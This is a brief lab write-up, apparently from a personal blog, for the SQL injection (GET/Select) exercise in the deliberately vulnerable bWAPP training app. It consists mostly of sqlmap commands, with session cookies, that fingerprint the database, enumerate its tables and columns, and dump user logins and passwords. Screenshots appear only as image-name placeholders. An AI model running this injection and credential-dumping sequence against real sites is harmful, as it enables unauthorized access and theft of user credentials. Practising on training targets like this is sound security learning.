bWAPP WriteUp

Pub Date: 2023-10-16

SQL Injection (GET/Select)

low level

image-20231016211321200

sqlmap --cookie "PHPSESSID=kc186hka69s02h3upa2d1am920; security=impossible; security_level=0" -u "http://127.0.0.1:3000/sqli_2.php?movie=7&action=go" -f --banner --dbs --users -v 3

image-20231016211440534 set level 3

sqlmap --cookie "PHPSESSID=atbgcf325gg6871ee7ilcn2ak3; security_level=0" -u "https://bwapp.hakhub.net/sqli_2.php?movie=1&action=go" -f --banner --dbs --users -v 3 --level 3

image-20231016212453380 set http_proxy for sqlmap

sqlmap --cookie "PHPSESSID=atbgcf325gg6871ee7ilcn2ak3; security_level=0" -u "https://bwapp.hakhub.net/sqli_2.php?movie=1&action=go" -f --banner --dbs --users -v 3 --level 3 --proxy http://demo.com:8080

get databases

sqlmap --cookie "PHPSESSID=kc186hka69s02h3upa2d1am920; security=impossible; security_level=0" -u "http://127.0.0.1:3000/sqli_2.php?movie=7&action=go" -dbs

image-20231017234332840 set database to bWAPP and get tables

sqlmap --cookie "PHPSESSID=kc186hka69s02h3upa2d1am920; security=impossible; security_level=0" -u "http://127.0.0.1:3000/sqli_2.php?movie=7&action=go" -dbs -D bWAPP -tables

image-20231017234509058 set database to bWAPP and set tables to users and get columns

sqlmap --cookie "PHPSESSID=kc186hka69s02h3upa2d1am920; security=impossible; security_level=0" -u "http://127.0.0.1:3000/sqli_2.php?movie=7&action=go" -dbs -D bWAPP -tables -T users -columns

image-20231017234659916 set database to bWAPP and set tables to users and get columns by column name

sqlmap --cookie "PHPSESSID=kc186hka69s02h3upa2d1am920; security=impossible; security_level=0" -u "http://127.0.0.1:3000/sqli_2.php?movie=7&action=go" -dbs -D bWAPP -tables -T users -columns -C login password -dump-all

image-20231017234935366 we can get user name and passwordimage-20231017235649486